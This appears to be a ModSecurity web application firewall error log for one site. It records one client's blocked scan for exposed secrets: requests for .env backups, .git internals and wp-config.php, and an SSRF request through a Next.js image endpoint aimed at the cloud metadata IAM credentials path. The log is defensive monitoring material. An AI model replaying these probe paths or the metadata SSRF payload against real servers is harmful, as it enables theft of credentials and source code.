[Mon May 11 19:11:46.873873 2026] [security2:error] [pid 1424905:tid 1424930] [client 45.148.10.249:10834] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.old"] [unique_id "agIN0oW8yzYoWG_eyCXPbgAAAVY"]
[Mon May 11 19:11:46.874071 2026] [security2:error] [pid 1424905:tid 1424930] [client 45.148.10.249:10834] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0oW8yzYoWG_eyCXPbgAAAVY"]
[Mon May 11 19:11:46.876226 2026] [security2:error] [pid 1501883:tid 1501888] [client 45.148.10.249:10808] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "habilis.space"] [uri "/_next/image"] [unique_id "agIN0jP5Q_-MBliRCAxCYAAAAAM"]
[Mon May 11 19:11:46.877492 2026] [security2:error] [pid 1501883:tid 1501888] [client 45.148.10.249:10808] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/_next/image"] [unique_id "agIN0jP5Q_-MBliRCAxCYAAAAAM"]
[Mon May 11 19:11:46.877710 2026] [security2:error] [pid 1501883:tid 1501888] [client 45.148.10.249:10808] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0jP5Q_-MBliRCAxCYAAAAAM"]
[Mon May 11 19:11:46.877930 2026] [security2:error] [pid 1502013:tid 1502045] [client 45.148.10.249:10974] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/index"] [unique_id "agIN0pYn-x0CHsbEbP2GnwAAAJI"]
[Mon May 11 19:11:46.878064 2026] [security2:error] [pid 1502013:tid 1502045] [client 45.148.10.249:10974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/index"] [unique_id "agIN0pYn-x0CHsbEbP2GnwAAAJI"]
[Mon May 11 19:11:46.878137 2026] [security2:error] [pid 1424905:tid 1424932] [client 45.148.10.249:10880] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.bak"] [unique_id "agIN0oW8yzYoWG_eyCXPcAAAAVg"]
[Mon May 11 19:11:46.878285 2026] [security2:error] [pid 1502013:tid 1502045] [client 45.148.10.249:10974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0pYn-x0CHsbEbP2GnwAAAJI"]
[Mon May 11 19:11:46.878335 2026] [security2:error] [pid 1424905:tid 1424932] [client 45.148.10.249:10880] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.bak"] [unique_id "agIN0oW8yzYoWG_eyCXPcAAAAVg"]
[Mon May 11 19:11:46.878670 2026] [security2:error] [pid 1501831:tid 1501842] [client 45.148.10.249:10946] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env~"] [unique_id "agIN0lNddpkriGUb6ZVRfAAAAQk"]
[Mon May 11 19:11:46.878674 2026] [security2:error] [pid 1424905:tid 1424932] [client 45.148.10.249:10880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0oW8yzYoWG_eyCXPcAAAAVg"]
[Mon May 11 19:11:46.878791 2026] [security2:error] [pid 1501831:tid 1501842] [client 45.148.10.249:10946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env~"] [unique_id "agIN0lNddpkriGUb6ZVRfAAAAQk"]
[Mon May 11 19:11:46.879138 2026] [security2:error] [pid 1501831:tid 1501842] [client 45.148.10.249:10946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0lNddpkriGUb6ZVRfAAAAQk"]
[Mon May 11 19:11:46.879537 2026] [security2:error] [pid 1501883:tid 1501907] [client 45.148.10.249:10904] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/wp-config.php"] [unique_id "agIN0jP5Q_-MBliRCAxCYgAAABY"]
[Mon May 11 19:11:46.879662 2026] [security2:error] [pid 1501883:tid 1501907] [client 45.148.10.249:10904] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/wp-config.php"] [unique_id "agIN0jP5Q_-MBliRCAxCYgAAABY"]
[Mon May 11 19:11:46.879824 2026] [security2:error] [pid 1511173:tid 1511191] [client 45.148.10.249:10806] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/refs/heads/master"] [unique_id "agIN0vjVc-A-CSptvm1OGQAAAE8"]
[Mon May 11 19:11:46.879858 2026] [security2:error] [pid 1501883:tid 1501907] [client 45.148.10.249:10904] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0jP5Q_-MBliRCAxCYgAAABY"]
[Mon May 11 19:11:46.879962 2026] [security2:error] [pid 1511173:tid 1511191] [client 45.148.10.249:10806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/refs/heads/master"] [unique_id "agIN0vjVc-A-CSptvm1OGQAAAE8"]
[Mon May 11 19:11:46.880175 2026] [security2:error] [pid 1511173:tid 1511191] [client 45.148.10.249:10806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0vjVc-A-CSptvm1OGQAAAE8"]
[Mon May 11 19:11:46.888611 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/api/.env"] [unique_id "agIN0lNddpkriGUb6ZVRfQAAARc"]
[Mon May 11 19:11:46.888734 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/api/.env"] [unique_id "agIN0lNddpkriGUb6ZVRfQAAARc"]
[Mon May 11 19:11:46.888916 2026] [security2:error] [pid 1501831:tid 1501856] [client 45.148.10.249:10950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0lNddpkriGUb6ZVRfQAAARc"]
[Mon May 11 19:11:46.889831 2026] [security2:error] [pid 1501883:tid 1501893] [client 45.148.10.249:10846] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/app/.env"] [unique_id "agIN0jP5Q_-MBliRCAxCYwAAAAg"]
[Mon May 11 19:11:46.889950 2026] [security2:error] [pid 1501883:tid 1501893] [client 45.148.10.249:10846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/app/.env"] [unique_id "agIN0jP5Q_-MBliRCAxCYwAAAAg"]
[Mon May 11 19:11:46.890129 2026] [security2:error] [pid 1501883:tid 1501893] [client 45.148.10.249:10846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0jP5Q_-MBliRCAxCYwAAAAg"]
[Mon May 11 19:11:46.891999 2026] [security2:error] [pid 1502013:tid 1502050] [client 45.148.10.249:10928] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agIN0pYn-x0CHsbEbP2GoQAAAJg"]
[Mon May 11 19:11:46.892123 2026] [security2:error] [pid 1502013:tid 1502050] [client 45.148.10.249:10928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agIN0pYn-x0CHsbEbP2GoQAAAJg"]
[Mon May 11 19:11:46.892428 2026] [security2:error] [pid 1502013:tid 1502050] [client 45.148.10.249:10928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0pYn-x0CHsbEbP2GoQAAAJg"]
[Mon May 11 19:11:46.892662 2026] [security2:error] [pid 1511173:tid 1511188] [client 45.148.10.249:10810] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agIN0vjVc-A-CSptvm1OGwAAAEw"]
[Mon May 11 19:11:46.892782 2026] [security2:error] [pid 1511173:tid 1511188] [client 45.148.10.249:10810] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agIN0vjVc-A-CSptvm1OGwAAAEw"]
[Mon May 11 19:11:46.892970 2026] [security2:error] [pid 1511173:tid 1511188] [client 45.148.10.249:10810] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0vjVc-A-CSptvm1OGwAAAEw"]
[Mon May 11 19:11:46.894567 2026] [security2:error] [pid 1502013:tid 1502066] [client 45.148.10.249:10920] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/config/.env"] [unique_id "agIN0pYn-x0CHsbEbP2GogAAAIM"]
[Mon May 11 19:11:46.894684 2026] [security2:error] [pid 1502013:tid 1502066] [client 45.148.10.249:10920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/config/.env"] [unique_id "agIN0pYn-x0CHsbEbP2GogAAAIM"]
[Mon May 11 19:11:46.894870 2026] [security2:error] [pid 1502013:tid 1502066] [client 45.148.10.249:10920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0pYn-x0CHsbEbP2GogAAAIM"]
[Mon May 11 19:11:46.895345 2026] [security2:error] [pid 1501831:tid 1501836] [client 45.148.10.249:10896] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/storage/.env"] [unique_id "agIN0lNddpkriGUb6ZVRfwAAAQM"]
[Mon May 11 19:11:46.895604 2026] [security2:error] [pid 1501831:tid 1501836] [client 45.148.10.249:10896] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/storage/.env"] [unique_id "agIN0lNddpkriGUb6ZVRfwAAAQM"]
[Mon May 11 19:11:46.895865 2026] [security2:error] [pid 1501831:tid 1501836] [client 45.148.10.249:10896] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agIN0lNddpkriGUb6ZVRfwAAAQM"]
[Mon May 11 19:11:46.895956 2026] [security2:error] [pid 1511173:tid 1511190] [client 45.148.10.249:10966] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/refs/heads/main"] [unique_id "agIN0vjVc-A-CSptvm1OHAAAAE4"]
[Mon May 11 19:11:46.896084 2026] [security2:error] [pid 1511173:tid 1511190] [client 45.148.10.249:10966] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/refs/heads/main"] [unique_id "agIN0vjVc-A-CSptvm1OHAAAAE4"]
